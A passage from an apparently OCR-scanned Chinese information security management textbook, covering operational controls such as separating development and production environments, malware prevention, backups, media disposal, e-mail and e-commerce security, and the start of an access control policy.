试 的 代码 或 者 修改 操作 代码 。 在 某 些 系 统 上 这 种 能 力 可 能 被 滥用 ,甚至 导致 违法 , 即 引 入 未 


经 检验 或 恶意 性 的 代码 ,这些 代 码 会 引起 严重 的 操作 问题 。 开 发 人 员 和 测试 人 员 还 构成 对 
操作 信息 机 密 性 的 威胁 。 

如 果 开 发 和 测试 与 软件 和 信息 同 在 一 个 计算 环境 中 ,那么 开发 和 测试 活动 可 能 会 对 软 
件 和 信息 造成 意 想 不 到 的 变动 。 因 此 ,需要 将 开发 设施 ,测试 设施 与 操作 设施 分 离 ,降低 意 
外 改动 或 非法 访问 操作 软件 和 业务 数据 的 风险 。 应 考虑 以 下 控制 措施 。 

开发 和 操作 软件 尽 可 能 在 不 同 的 计算 机 处 理 器 上 运行 ,或 者 在 不 同 的 域 或 目录 中 。 

开发 和 测试 活动 应 尽 可 能 分 开 进 行 。 

如 果 没 有 必要 ,不 允许 从 操作 系统 访问 编译 程序 编辑 程序 和 其 他 系统 实用 程序 。 

操作 系统 和 测试 系统 应 该 使 用 不 同 的 登录 程序 ,降低 出 错 的 风险 。 对 于 这 些 系统 应 鼓 
励 用 户 使 用 不 同 的 口令 ,并且 菜 单 应 该 显示 适当 的 标识 消息 。 

在 控制 措施 得 到 落实 后 ,开发 人 员 才 可 以 获得 操作 口令 。 

发 布 操作 系统 支持 的 口令 。 控 制 措施 应 该 确保 这 些 口 令 在 使 用 后 及 时 更 改 。 

6. 外 部 设施 管理 

使 用 外 部 合同 商 管理 信息 处 理 设施 可 能 会 造成 潜在 的 安全 暴露 ,例如 ,在 承包 商 的 办 公 
地 点 可 能 危害 、 破 坏 数据 安全 或 丢失 数据 。 这 些 风险 应 事先 得 到 确认 ,与 承包 商 达 成 适当 的 
控制 措施 并 写 入 合同 中 。 

特别 需要 解决 的 问题 包括 : 确定 内 部 保留 的 敏感 或 关键 应 用 程序 ; 获得 业务 应 用 程序 
所 有 者 的 认可 ; 业务 连续 性 计划 的 含义 ; 待 指定 的 安全 标准 和 符合 性 检查 的 方法 ; 有 效 监 
控 所 有 相关 安全 活动 的 具体 职责 的 分 配 和 程序 步 又; 报告 和 处 理 安全 事故 的 责任 和 程序 


7.6.2 系统 规划 与 验收 


系统 规划 与 验收 的 目标 是 最 大 限度 降低 系统 故障 的 风险 。 预 先 规划 和 准备 是 必 不 可 
少 ,这 样 可 以 确保 有 足够 的 容量 和 资源 。 应 该 制定 未 来 容量 要 求 的 预算 规划 ,从 而 降低 系统 
超载 的 风险 。 在 验收 和 使 用 新 的 系统 前 ,应 该 建立 系统 的 操作 要 求 ,并 对 这 些 要求 进 行 备案 
和 检测 。 

1. 容量 规划 

容量 需求 需要 进行 监视 ,并 且 还 应 该 制定 未 来 的 容量 要 求 的 规划 ,确保 系统 有 足够 的 处 
理 能 力 和 存储 空间 。 这 些 预 算 规 划 不 仅 应 考虑 到 新 的 业务 和 系统 的 要 求 , 还 应 该 考虑 到 组 
织 在 信息 处 理 技术 的 现状 和 规划 趋势 。 

大 型 计算 机 尤其 需要 注意 ,因为 增加 大 型 计算 机 的 新 容量 ,成 本 会 更 加 高 昂 并 且 交付 周 
期 也 更 长 。 大 型 计算 机 的 管理 员 应 监视 主要 系统 资源 的 使 用 情况 ,包括 处 理 器 、 主 存储 器 、 
文件 存储 器 、 打 印 机 和 其 他 输出 设备 以 及 通信 系统 。 他 们 应 该 判别 资源 的 使 用 趋势 ,尤其 是 
与 业务 应 用 程序 或 管理 信息 系统 工具 的 关系 。 

管理 员 应 使 用 这 一 信息 来 识别 和 避免 可 能 出 现 的 威胁 系统 安全 或 用 户 服务 的 瓶颈 , 同 
时 制订 适当 的 补救 措施 。 

2. 系统 验收 

建立 新 的 信息 系统 .系统 升级 和 新 版 本 的 验收 标准 ,并 在 验收 前 履行 适当 的 系统 测试 。 
管理 员 应 明确 制定 新 系统 的 验收 要 求 和 标准 ,并 且 这 些 标准 和 要 求 得 到 认可 、 记 录 和 经 过 检 
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验 。 应 考虑 以 下 因素 : 

CD 性 能 和 计算 机 容量 要 求 ; 

(2) 错误 恢复 和 重新 启动 的 步骤 ,以 及 应 急 计 划 ; 

(3) 准备 和 检验 常规 的 操作 程序 ,使 之 成 为 确定 标准 ; 

(4) 认可 的 安全 控制 投入 使 用 ; 

(5) 有 效 的 人 工 方法 ; 

(6) 业务 连续 性 部 署 ; 

(7) 安装 新 系统 不 会 对 现 有 系统 产生 负面 影响 的 事实 ,尤其 在 高 峰 处 理 时 间 ( 比 如 月 末 ); 

(8) 新 系统 给 组 织 的 整体 安全 带 来 影响 的 事实 ; 

(9) 操作 或 使 用 新 系统 的 培训 。 

对 于 重要 的 新 技术 发 展 ,运营 部 门 和 用 户 应 关注 发 展 过 程 的 每 个 阶段 ,确保 被 提议 的 系 
统 设计 具有 很 高 的 操作 效率 。 执 行 适当 的 检验 测试 可 以 确认 所 有 验收 标准 是 否 完全 达到 。 

3. 防止 恶意 软件 

防止 恶意 软件 的 目标 是 保护 软件 和 信息 的 完整 性 。 防 范 措施 可 以 防止 和 检测 到 恶意 软 
件 的 入 侵 , 因 此 不 可 缺少 。 软 件 和 信息 处 理 设施 易 受 恶意 软件 的 攻击 ,例如 计算 机 病毒 、 网 
络 蠕虫 .特洛伊 森马 和 逻辑 炸弹 。 应 提醒 用 户 警 觉 未 授权 软件 或 恶意 软件 的 危险 ,并 且 管 理 
员 应 适当 地 引入 特殊 的 控制 手段 检测 或 防范 这 些 软件 的 侵袭 。 尤 其 是 ,采取 防范 措施 检查 
和 预防 个 人 计算 机 上 的 病毒 是 必 不 可 少 的 。 

应 执行 防范 恶意 软件 的 检测 和 预防 控制 措施 ,以 及 适当 的 通知 用 户 的 方法 。 恶 意 软 件 
的 防范 措施 应 根据 安全 意识 、 适 当 的 系统 访问 和 变更 管理 控制 来 制定 。 

应 考虑 以 下 控制 措施 : 

(1) 一 个 正式 策略 ,要 求 遵 守 软 件 许可 ,禁止 使 用 未 授权 的 软件 。 

(2) 一 个 正式 策略 ,防范 与 从 外 部 网 络 或 经 外 部 网 络 ,或 者 在 其 他 介质 上 获取 文件 和 软 
件 相关 的 风险 ,指明 应 采取 什么 防范 措施 。 

(3) 安装 并 定期 更 新 抗 病毒 的 检测 和 修复 软件 来 检查 计算 机 和 其 他 介质 ,将 它 作为 一 
种 预防 控制 手段 或 者 常规 手段 。 

(4) 定期 检查 支持 关键 业务 进程 的 系统 的 软件 和 数据 内 容 ; 正式 调查 未 许可 文件 或 未 
授权 修改 的 出 现 情况 。 

(5) 在 使 用 前 检查 电子 媒介 上 的 所 有 文件 是 否 有 未 确定 的 或 未 授权 的 来 源 , 或 者 检查 
通过 非 置信 网 络 接收 的 文件 是 否 有 病毒 。 

(6) 在 使 用 前 检查 所 有 电子 邮件 附件 和 下 载 内 容 是 否 有 恶意 软件 ; 检查 可 以 在 不 同 的 
地 方 进行 ,例如 电子 邮件 服务 器 ,台式 计算 机 或 者 在 进入 组 织 的 网 络 的 时 候 。 

(7) 执行 系统 病毒 防护 的 管理 步骤 和 责任 ,使 用 防范 措施 的 培训 ,报告 病毒 攻击 并 从 攻 
击 中 恢复 。 

(8) 适当 地 从 病毒 攻击 中 恢复 的 业务 连续 性 计划 ,包括 所 有 需要 的 数据 和 软件 备份 和 
恢复 安排 。 

(9) 检验 与 恶意 软件 有 关 的 所 有 信息 并 确保 警告 公告 准确 和 详细 的 方法 。 管 理 员 应 确 
保 使 用 合格 来 源 ( 如 著名 杂志 、 可 信 Internet 站 点 或 反 病 毒 软件 供应 商 ) 来 识别 哪些 是 恶作剧 
而 哪些 是 真正 的 病毒 。 应 让 职员 了 解 恶 作 剧 的 问题 ,并 告诉 他 们 在 收 到 这 类 软件 时 如 何 处 理 。 


(10) 在 网 络 文件 服务 器 支持 大 量 的 工作 站 时 ,这 些 控制 措施 尤为 重要 。 

4. 内 务 处 理 

内 务 处 理 的 目标 是 维护 信息 处 理 和 通信 服务 的 完整 性 和 可 用 性 。 建 立 常规 的 步骤 执行 
统一 的 备份 策略 ,备份 多 个 数据 副本 并 练习 及 时 恢复 数据 .记录 事件 和 错误 ,并 且 在 适当 的 
时 候 监 视 设 备 环境 。 

5. 信息 备份 

应 定期 备份 数 个 核心 业务 信息 和 软件 的 副本 。 拥 有 足够 的 备份 设备 可 以 确保 在 发 生 灾 
难 或 介质 故障 后 能 够 恢复 所 有 关键 业务 信息 和 软件 。 应 定期 检测 各 个 系统 的 备份 安排 , 确 
保 他 们 符合 业务 连续 性 计划 的 要 求 。 应 考虑 以 下 指导 方针 。 

最 基本 的 备份 信息 以 及 完整 准确 的 备份 副本 记录 和 文档 化 的 恢复 步骤 应 存储 在 一 个 很 
远 的 位 置 ,这 个 位 置 足以 避免 受 主 站 点 的 灾难 波及 。 对 于 重要 的 业务 应 用 程序 应 保留 至 少 
三 代 或 3 个 周期 的 备份 信息 

备份 信息 应 给 予 适当 级 别 的 物理 和 环境 保护 这 个 级 别 和 主 站 点 应 用 的 标准 一 致 。 对 
主 站 点 应 用 的 控制 应 扩展 到 覆盖 备份 站 点 。 

定期 测试 备份 介质 ,确保 在 需要 紧急 使 用 时 可 以 依赖 它 

定期 检查 和 测试 复原 步骤 ,确保 它们 不 仅 有 效 ,而 且 能 够 在 恢复 操作 步骤 分 配 的 时 间 内 

决定 关键 业务 信息 的 保留 时 间 ,并 且 确 定 永久 保留 的 归档 副本 的 要 求 。 

6. 操作 人 员 日 志 

操作 人 员 应 保留 他 们 活动 的 日 志 记录 。 根 据 需要 ,日 志 记 录 应 包括 : 系统 启动 和 结束 
时 间 ; 系统 错误 和 采取 的 纠正 措施 ; 确认 正确 处 理 数据 文件 和 计算 机 输出 ; 建立 日 志 条 目 
的 人 员 姓 名 。 

应 根据 操作 步骤 对 操作 人 员 的 日 志 记录 定期 进行 独立 的 检查 。 

7. 错误 日 志 记录 

应 报告 错误 并 采取 措施 予以 纠正 。 应 记录 用 户 报告 的 关于 信息 处 理 或 通信 系统 故障 的 
错误 。 应 有 一 个 明确 的 处 理 报告 的 错误 的 规则 ,包括 : 审查 错误 日 志 , 确 保 错误 已 经 得 到 满 
意 的 解决 ; 审查 纠正 措施 ,确保 没有 违反 控制 措施 ,并 且 采 取 的 行动 都 得 到 充分 的 授权 。 

8. 网 络 管理 

网 络 管理 的 目标 是 保证 网 络 信息 安全 ,保护 支持 性 的 体系 结构 。 可 能 跨越 组 织 边 界 的 
网 络 安全 管理 需要 特别 的 关注 。 可 能 还 需要 其 他 补充 控制 措施 来 保护 通过 公共 网 络 传送 的 
敏感 数据 。 

获得 并 维护 网 络 安全 需要 一 系列 控制 措施 。 网 络 管理 员 应 执行 控制 措施 确保 网 络 中 的 
数据 安全 ,并 保护 连接 的 服务 避免 非法 访问 。 尤 其 ,应 考虑 以 下 问题 。 

根据 需要 ,应 将 网 络 的 操作 职责 和 计算 机 的 操作 职责 分 离 。 

应 制定 远程 设备 (包括 用 户 区 域 的 设备 ) 的 管理 职责 和 程序 。 

如 果 需 要 ,应 指定 特殊 的 控制 措施 保护 通过 公共 网 络 传送 的 数据 的 机 密 性 和 完整 性 ,并 
保护 连接 的 系统 。 可 能 还 需要 特殊 的 控制 措施 维护 网 络 服务 和 所 连接 的 计算 机 的 可 用 性 。 

管理 活动 应 密切 协调 ,优化 为 业务 提供 的 服务 ,确保 控制 措施 在 整个 信息 处 理 基础 结构 
中 应 用 一 致 。 
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9. 介质 处 理 与 安全 

介质 处 理 与 安全 目标 是 防止 资产 受 损 以 及 业务 活动 中 断 。 应 控制 介质 并 对 其 进行 物理 
保护 。 应 制定 适当 的 操作 步骤 来 保护 文档 .计算 机 介质 (磁带 、 磁 盘 和 盒 式 磁带 )、 输 入 /输出 
数据 和 系统 文档 避免 损坏 、 盗 窃 和 非法 访问 。 

10. 计算 机 活动 介质 的 管理 

应 该 制定 对 计算 机 活动 介质 (如 磁带 磁盘、 盒 式 磁带 以 及 打印 报告 ) 的 管理 的 方法 。 应 
考虑 以 下 指导 方针 。 

如 果 不 再 需要 ,应 该 清除 再 可 重复 使 用 的 介质 上 要 删除 的 内 容 。 

删除 介质 中 的 组 织 内 容 需 要 得 到 批准 ,并 且 为 维护 审计 追踪 应 该 保留 所 有 这 类 删除 的 
记录 。 

所 有 介质 应 保存 在 一 个 安全 保险 的 环境 中 ,并 符合 制造 商 的 要 求 。 

应 明确 记录 所 有 的 步骤 和 授权 级 别 。 

11. 介质 处 置 

介质 不 再 需要 使 用 时 应 对 其 进行 安全 可 靠 地 处 置 。 介 质 处 置 不 认真 可 能 会 将 敏感 信息 
泄露 ,为 减少 风险 ,应 建立 安全 处 置 介质 的 正式 步骤 。 应 考虑 以 下 指导 方针 。 

(1) 保存 敏感 信息 的 介质 应 该 进行 安全 保险 的 保存 和 处 置 , 例 如 烧毁 或 粉碎 ,或 者 在 组 
织 内 的 其 他 应 用 使 用 前 清空 数据 。 

(2) 以 下 列表 确定 可 能 需要 安全 处 置 的 项 : 书面 文档 ; 声音 或 其 他 记录 ; 复写 纸 ; 输出 
报告 ; 一 次 性 使 用 打印 色 带 ; 磁带 ; 活动 磁盘 或 盒 式 磁带 ; 光 存 储 介质 (各 种 形式 并 包括 所 
有 制造 商 软件 分 发 介质 ); 程序 清单 ; 测试 数据 ; 系统 文档 。 

(3) 安排 安全 收集 和 处 置 所 有 介质 项 比试 图 分 离 敏 感 项 要 容易 得 多 。 

(4) 许多 组 织 提供 收集 和 处 置 纸张 .设备 和 介质 的 服务 。 谨 慎 选 择 掌握 大 量 控制 措施 
并 具有 经 验 的 合格 合同 商 。 

(5) 应 尽 可 能 记录 对 敏感 项 的 处 置 ,保留 审计 追踪 。 在 积累 处 置 的 介质 时 ,应 考虑 聚集 
效应 可 能 导致 大 量 未 分 类 信息 比 少量 分 类 信息 变 得 更 加 难以 控制 。 

12. 信息 处 理 程序 

为 了 保护 此 类 信息 免 遭 受 非 法 公开 或 滥用 ,应 该 制定 信息 处 理 和 存储 程序 。 应 制定 处 
理 信 息 的 方法 步骤 ,并 且 与 以 下 分 类 一 致 : 文档 .计算 系统 .网 络 、 移 动 计算 、 移 动 通信 、 邮 
TF .语音 邮件 .一般 语音 通信 、 多 媒体 .邮寄 服务 /设施 ,传真 机 使 用 和 其 他 任何 敏感 项 (如 空 
白 支票 .发票 等 ) 。 应 考虑 以 下 问题 。 

(1) 处 理 和 标记 所 有 介质 。 

(2) 访问 限制 ,以 确定 未 授权 人 员 的 身份 。 

G) 维护 授权 人 员 接 收 数据 的 正式 记录 。 

(4) 确保 输入 数据 完整 ,妥善 完成 处 理 和 应 用 输出 验证 。 

(5) 保护 正在 等 待 输 出 的 假 脱 机 数据 与 其 敏感 度 一 致 。 

(6) 在 符合 生产 商 要 求 的 环境 中 储存 介质 。 

(7) 保持 数据 分 布 的 最 低 水 平 。 

(8) 清晰 标记 所 有 数据 副本 ,提醒 合法 接收 者 注意 。 

(9) 定期 检查 分 布 列表 和 合法 接收 人 员 的 列表 。 


13. 系统 文档 的 安全 

系统 文档 可 以 包含 一 系列 的 敏感 信息 ,例如 对 应 用 程序 进程 过程. 数 据 结 构 和 授权 程 
序 的 说 明 应 考虑 以 下 控制 措施 来 保护 系统 文档 不 受 非 法 访问 。 

(1) 应 安全 存储 系统 文档 。 

(2) 系统 文档 的 访问 列表 应 让 少数 知道 ,使 用 时 需 经 过 应 用 程序 所 有 者 授权 。 

G) 保留 在 公共 网 络 上 或 通过 公共 网 络 提供 的 系统 文档 应 妥善 保护 。 

14. 信息 和 软件 交换 

信息 和 软件 交换 管理 的 目标 是 防止 组 织 间 交 换 信息 时 信息 受 损 、 修 改 或 滥用 。 应 控制 
组 织 间 的 信息 和 软件 的 交换 ,并 且 交 换 应 符合 有 关 立 法 。 执 行 交 换 应 在 双方 意见 一 致 的 情 
况 下 进行 。 应 制定 保护 信息 和 传输 介质 的 方法 和 标准 。 应 考虑 与 电子 数据 交换 .电子 商务 
和 电子 邮件 有 关 的 业务 和 安全 以 及 对 控制 措施 的 要 求 。 

15. 信息 和 软件 交换 协议 

为 了 便于 组 织 间 以 电子 方式 或 手工 方式 交换 信息 和 软件 ,应 该 签署 协议 ,有 些 协议 可 以 
为 正式 协议 ,适当 的 时 候 还 包括 软件 第 三 方 协议 。 这 些 协 议 的 内 容 应 反映 有 关 业 务 信息 的 
敏感 度 。 应 考虑 有 关 安 全 条 件 的 协议 如 下 。 

(1) 控制 和 通知 传播 ,发 送 和 接收 的 管理 责任 。 

D 通知 发 送 方 、 传 输 ,发 送 和 接收 的 步骤 程序 。 

(3) 打包 和 传输 的 最 低 技术 标准 。 

(4) 投递 者 标识 标准 。 

(5) 丢失 数据 的 责任 和 偿还 。 

(6) 为 敏感 或 关键 信息 使 用 认可 的 标记 方法 ,确保 标记 方式 易于 理解 并 且 信 息 得 到 受 
善 保护 。 

(7) 信息 和 软件 的 所 有 权 以 及 数据 保护 的 责任 、 软 件 版 权 规 定 和 类 似 因素 记录 和 阅读 
信息 和 软件 的 技术 标准 。 

(8) 保护 敏感 数据 需要 的 特殊 控制 措施 ,例如 加 密 密 钥 。 

16. 传输 中 介质 的 安全 

在 实际 传输 过 程 中 ,信息 容易 受到 非法 访问 、 滥 用 或 破坏 ,例如 ,在 通过 邮局 服务 或 速递 
公司 发 送 介质 的 时 候 。 应 使 用 以 下 控制 措施 来 保护 在 站 点 之 间 传 送 的 计算 机 介质 。 

COD 使 用 可 靠 的 传输 工具 或 投递 人 。 授 权 的 投递 人 应 接受 管理 并 进行 投递 人 身份 
检查 。 

(2) 包装 应 该 非常 结实 ,可 以 保护 里 面 内 容 不 受 运输 过 程 中 可 能 发 生 的 事故 造成 损坏 ， 
并 符合 生产 商 的 说 明 。 

(3) 需要 的 时 候 采 取 特 殊 的 控制 措施 保护 敏感 数据 免 遭 非法 公开 或 修改 。 示 例 包括 : 
使 用 加 锁 容器 ; 手工 运送 ; 加 固 包装 (暴露 任何 访问 的 企图 ); 在 特殊 情况 下 ,可 以 将 运输 分 
几 次 完成 并 选择 不 同 的 发 送 路 线 。 

17. 电子 商务 安全 

电子 商务 包括 使 用 电子 数据 交换 (EDI) .电子 邮件 和 通过 公共 网 络 (如 Internet) 在 线 交 
易 。 电 子 商 务 易 受 网 络 威胁 的 攻击 ,可 能 会 导致 欺诈 活动 .合同 纠纷 以 及 泄露 或 修改 信息 ， 
应 使 用 控制 措施 保护 电子 商务 不 受 这 类 威胁 。 电 子 商 务 的 安全 考虑 应 包括 以 下 内 容 。 
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(1) 验证 。 顾 客 和 商家 在 互相 确定 身份 上 应 该 要 求 什么 样 的 保密 程度 ? 

(2) 授权 。 向 谁 授权 制定 价格 ,发 出 或 签署 关键 的 交易 文件 ,交易 伙伴 如 何 了 解 ? 

CD 合同 和 投标 程序 。 在 发 送 和 接收 关键 文档 和 认可 合同 的 保密 性 、 完 整 性 和 证 据 有 
什么 要 求 ? 

(4) 定价 信息 。 在 公开 的 价目 表 上 包含 什么 级 别 的 信用 和 敏感 折扣 的 机 密 ? 

CO 订单 交易 。 如 何 提供 订单 的 保密 性 和 完整 性 ,付款 和 运输 地 址 信息 和 收 货 确认 书 ? 

(6) 检查 。 检 查 顾客 提供 的 付款 信息 的 适宜 度 如 何 ? 

(7) 结算 。 最 适合 防止 欺诈 的 付款 形式 是 什么 ? 

(8) 订购 要 求 。 维 护 订购 信息 的 机 密 性 和 完整 性 ,以 及 避免 丢失 或 重复 交易 ,需要 采取 
什么 保护 ? 

O) 责任 。 谁 承担 欺诈 交易 的 风险 ? 

通过 应 用 加 密 技 术 就 可 以 解决 以 上 许多 问题 ,而 且 还 考虑 到 符合 法 律 要 求 。 交 易 伙 
伴 之 间 的 电子 商务 协议 还 应 该 需要 规定 各 方 同意 的 交易 条 款 的 文档 协议 来 支持 ,包括 授 
权 。 可 能 还 需要 与 信息 服务 提供 商 和 增值 网 络 运营 商 的 协议 。 公 共 交 易 系 统 应 向 顾客 
公布 经 营 条 件 ,还 应 该 考虑 化 解 对 用 于 电子 商务 的 主机 的 攻击 ,以 及 实施 网 络 互联 需要 的 
安全 。 

18. 电子 邮件 安全 

电子 邮件 正在 用 于 业务 通信 交流 ,正在 取代 传统 的 交流 形式 ,例如 电 传 和 信函 。 电 子 邮 
件 和 传统 的 业务 通信 方式 的 区 别 在 于 速度 \ 信 息 结构 ,信息 详细 程度 和 抵抗 非法 使 用 的 脆弱 
性 。 应 考虑 采取 控制 措施 来 减少 电子 邮件 带 来 的 安全 风险 。 安 全 风险 包括 : 

CD 存在 非法 访问 或 变更 或 拒绝 服务 的 漏洞 。 

(2) 无 力 防 止 错 误 出 现 ,例如 ,错误 的 地 址 或 方向 ,以 及 一 般 的 服务 可 靠 性 和 可 用 性。 

(3) 在 业务 流程 中 通信 介质 变化 的 影响 ,例如 ,增加 发 送 的 效果 或 从 个 人 到 个 人 与 公司 
到 公司 发 送 正式 消息 的 效果 不 同 。 

(4) 法 律 因素 ,例如 ,可 能 需要 原始 证 明 ,发 送 、 运 输 和 接受 的 证 明 。 

(5) 向 外 公布 可 访问 人 员 名 单 的 影响 。 

(6) 控制 远程 用 户 访问 电子 邮件 账户 。 

公司 应 制定 关于 使 用 电子 邮件 的 策略 ,包括 : 

CD 对 电子 邮件 的 攻击 ,例如 病毒 .拦截 ; 

(2) 电子 邮局 附件 保护 ; 

(3) 何 时 不 使 用 电子 邮件 的 规定 ; 

CD 雇员 不 违反 公司 规定 的 责任 ,例如 ,发送 诽谤 电子 邮件 .进行 骚扰 或 非法 采购 ; 

C5) 使 用 加 密 技 术 保护 电子 邮件 的 机 密 性 和 完整 性 。 

保留 消息 ,如 果 存 储 起 来 ,一 旦 出 现 诉讼 可 以 找到 。 

检查 消息 是 否 经 过 验证 的 其 他 控制 措施 。 

应 该 制定 并 实施 策略 和 指导 原则 ,控制 与 电子 办 公 系 统 相 关 的 业务 和 安全 风险 。 通 过 
结合 以 下 各 项 ,这 些 方法 提供 了 快速 传播 和 共享 业务 信息 的 机 会 : 文档 、 计 算 系 统 、 网 络 、 移 
动 计算 ,移动 通 信 、 邮 件 、 语 音 邮 件 、 一 般 语音 通信 多媒体、 邮寄 服务 /设施 、 传 真 机 。 这 些 设 
施 互联 的 安全 和 业务 含义 需要 考虑 的 因素 包括 : 


(1) 办 公 系 统 的 信息 漏洞 ,例如 ,电话 记录 或 电话 会 议 。 

(2) 保密 电话 ,传真 储存 ,打开 邮件 ,发 布 邮件 。 

(3) 管理 信息 共享 的 策略 和 适当 的 控制 措施 。 例 如 ,使 用 公司 电子 公告 

(4) 如 果 没 有 提供 适当 的 保护 级 别 , 则 将 排除 敏感 业务 信息 类 别 。 

(5) 将 访问 相关 日 常 信息 的 权限 限制 在 选中 的 个 人 ,例如 ,开发 敏感 项 目的 人 员 。 

(6) 适用 性 ,或 者 支持 业务 程序 的 系统 适用 性 ,例如 ,通信 顺序 或 授权 。 

CD). 允许 使 用 系统 的 人 员 ,合同 商 或 业务 伙伴 的 类 型 ,以 及 访问 系统 的 出 发 位 置 。 

(8) 将 所 选 的 设施 限制 给 特定 类 型 的 用 户 使 用 。 

(9) 为 其 他 用 户 的 利益 ,确定 用 户 状态 ,例如 ,组 织 的 雇员 或 目录 中 的 合同 商 。 

(10) 保留 信息 并 在 系统 上 保存 备份 。 

(11) 撤退 要 求 和 安排 。 

19. 信息 公布 系统 

应 小 心 保护 电子 公布 信息 的 完整 性 防止 非法 进行 修改 ,因为 这 类 修改 可 能 会 损害 发 布 
组 织 的 声誉 。 公 布 系统 上 的 信息 (如 通过 Internet 可 以 访问 的 Web 服务 器 上 的 信息 ) 必 须 
符合 司法 部 门 制定 有 关 安 装 系统 或 进行 交易 的 法 规 。 在 将 信息 公布 以 前 ,应 该 有 一 个 正式 
的 授权 过 程 。 

在 信息 公布 系统 上 的 软件 .数据 和 其 他 信息 需要 很 高 的 完整 性 ,应 考虑 通过 适当 的 机 制 
进行 保护 ,例如 数字 签名 。 电 子 公 布 系统 ,特别 是 那些 允许 反馈 和 直接 输入 信息 的 系统 ,应 
谨慎 控制 ,以便 : 

A) 以 符合 数据 保护 法 律 的 形式 获得 信息 ; 

(2) 输入 到 公布 系统 并 由 该 系统 处 理 的 信息 需要 及 时 全 部 得 到 处 理 ， 

(3) 在 收集 信息 过 程 中 和 存储 信息 时 需要 保护 敏感 信息 ; 

OD 对 公布 系统 的 访问 不 允许 擅自 访问 它 所 连接 的 网 络 。 

20. 其 他 的 信息 交换 形式 

应 该 制定 程序 和 控制 措施 ,保护 通过 使 用 语音 、 传 真 和 视频 通信 设施 进行 的 信息 交换 。 
在 使 用 这 些 设施 时 由 于 缺乏 意识 .策略 或 方法 ,信息 可 能 遭 到 破坏 ,例如 ,在 公共 场所 使 用 移 
动 电话 被 偷 听 ,应 答 机 器 被 偷 听 ,非法 访问 拨 入 语音 邮件 系统 或 者 使 用 传真 设备 错误 将 传真 
发 给 另外 一 个 人 等 。 

如 果 由 于 超载 或 中 断 导 致 通信 设施 出 现 故 障 ,那么 业务 经 营 可 能 中 止 , 信 息 可 能 被 破 
坏 。 如 果 设 施 被 非法 用 户 访问 ,信息 也 可 能 被 破坏 。 

应 制定 一 个 明确 的 策略 步骤 说 明 ,要 求职 员 按 说 明 使 用 语音 、 传 真 和 视频 通信 。 它 应 包 
括 以 下 内 容 。 

(1) 提醒 职员 应 采取 适当 的 预防 措施 ,避免 在 使 用 电话 时 由 于 被 窃听 或 拦截 暴露 敏感 
信息 : 在 使 用 移动 电话 时 尤其 注意 四 周 离 他 最 近 的 人 ; 是 否 有 在 电话 简 或 电话 线 上 安装 窃 
听 器 或 其 他 设备 的 情况 ,或 者 在 使 用 模拟 信号 的 移动 电话 有 没有 使 用 搜索 接受 机 ; 在 受 话 
端 一 方 的 人 。 

(2) 提醒 职员 不 要 在 公共 场所 或 在 薄 墙 隔 开 的 办 公 室 和 会 议 室 讨论 机 密 。 

(3) 不 要 在 应 答 机 上 留言 ,因为 可 能 被 非法 人 员 听 取 ,或 者 保存 在 公共 系统 上 或 由 于 错 
误 保存 导致 错误 拨号 。 
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(4) 提醒 职员 有 关 使 用 传真 机 的 问题 , 即 : 非法 访问 内 置 的 消息 存储 来 检索 消息 ; 有 意 
无 意 设置 传真 机 程序 使 其 将 消息 发 向 特定 号 码 ; 由 于 错误 拨号 或 使 用 错误 的 储存 号 码 将 文 
件 和 消息 发 到 错误 的 传真 机 上 。 


7.7 访问 控制 


访问 控制 的 目标 是 控制 对 信息 的 访问 。 应 该 根据 业务 要 求 和 安全 要 求 对 信息 访问 与 业 
务 流程 加 以 控制 。 另 外 ,还 应 该 考虑 信息 传播 和 授权 的 策略 。 


7.7.1 访问 控制 策略 


1. 策略 与 业务 要 求 

应 该 明确 访问 控制 的 业务 要 求 并 记录 在 案 。 应 该 在 访问 策略 陈述 中 明确 规定 每 个 用 户 
或 用 户 组 的 访问 控制 规则 与 权限 。 应 该 向 用 户 和 服务 提供 商 明 确 说 明 访问 控制 应 该 达到 的 
业务 要 求 。 

该 策略 应 该 考虑 以 下 内 容 : 

(1) 各 个 业务 应 用 的 安全 要 求 。 

(2) 确定 与 业务 应 用 有 关 的 所 有 信息 。 

(3) 信息 传播 和 授权 策略 ,如 了 解 原则 以 及 信息 的 安全 级 别 与 分 类 的 需要 。 

(4) 不 同系 统 和 网 络 的 访问 控制 与 信息 分 类 策略 之 间 的 一 致 性 。 

(5) 关于 保护 对 数据 或 服务 访问 的 相关 法 律 和 合同 责任 。 

(6) 通用 工作 类 别 的 用 户 访问 标准 简 档 。 

(7) 在 分 布 式 网 络 环境 中 对 可 以 识别 各 种 可 用 连接 类 型 的 访问 权限 的 管理 。 

2. 访问 控制 规则 

制定 访问 控制 规则 时 ,应 该 谨慎 考虑 以 下 情况 ， 

CD. 区 分 必须 始终 实施 的 规则 和 有 选择 、 有 条 件 地 实施 的 规则 。 

(2) 在 “ 除 明 确 允 许 执 行情 况 外 一 般 必须 禁止 ”而 非 “ 除 明令 禁止 执行 情况 外 一 般 允 许 
执行 ”的 前 提 下 制定 规则 。 

G) 由 信息 处 理 设施 自身 导致 发 生 的 信息 标识 更 改 以 及 因 用 户 自行 处 理 导 致 发 生 的 信 
息 标识 的 更 改 。 

(4) 因 信 息 系统 自身 导致 发 生 的 用 户 权限 的 更 改 以 及 由 管理 员 导 致 发 生 的 用 户 权 限 的 
更 改 。 

(5) 实施 前 需要 管理 员 或 其 他 人 予以 批准 的 规则 以 及 不 需要 此 类 批准 的 规则 。 
7.7.2 用 户 访问 管理 

用 户 访问 管理 的 目标 是 防止 对 信息 系统 的 非法 访问 。 应 该 制定 正式 程序 ,控制 信息 系 
统 访问 权限 与 服务 访问 权限 的 分 配 。 这 些 程 序 应 该 涉及 用 户 访 问 生 命 周 期 的 各 个 阶段 ,从 


初期 的 新 用 户 注 册 到 用 户 因 不 再 要 求 对 信息 系统 和 服务 进行 访问 而 最 终 取 消 注册 。 应 该 根 
据 情况 注意 访问 特权 是 否 需要 进行 控制 。 用 户 车 拥有 访问 特权 就 会 越过 系统 的 控制 措施 。 


1. 用 户 注册 

应 该 制定 正式 的 用 户 注 册 和 取消 注册 程序 ,规范 对 所 有 多 用 户 信息 系统 与 服务 的 访问 
授权 。 应 该 通过 正式 的 用 户 注册 程序 来 控制 多 用 户 信息 服务 的 访问 权限 。 该 程序 应 该 包括 
以 下 内 容 : 

(1) 使 用 唯一 用 户 ID, 以 便 将 用 户 与 其 操作 联系 起 来 ,使 用 户 对 其 操作 负责 。 只 有 在 
其 权限 范围 内 进行 的 工作 , 才 人 允许 使 用 。 

(2) 检查 用 户 是 否 拥有 系统 所 有 者 对 信息 系统 或 服务 授予 的 权限 ,也 可 以 适当 地 分 别 
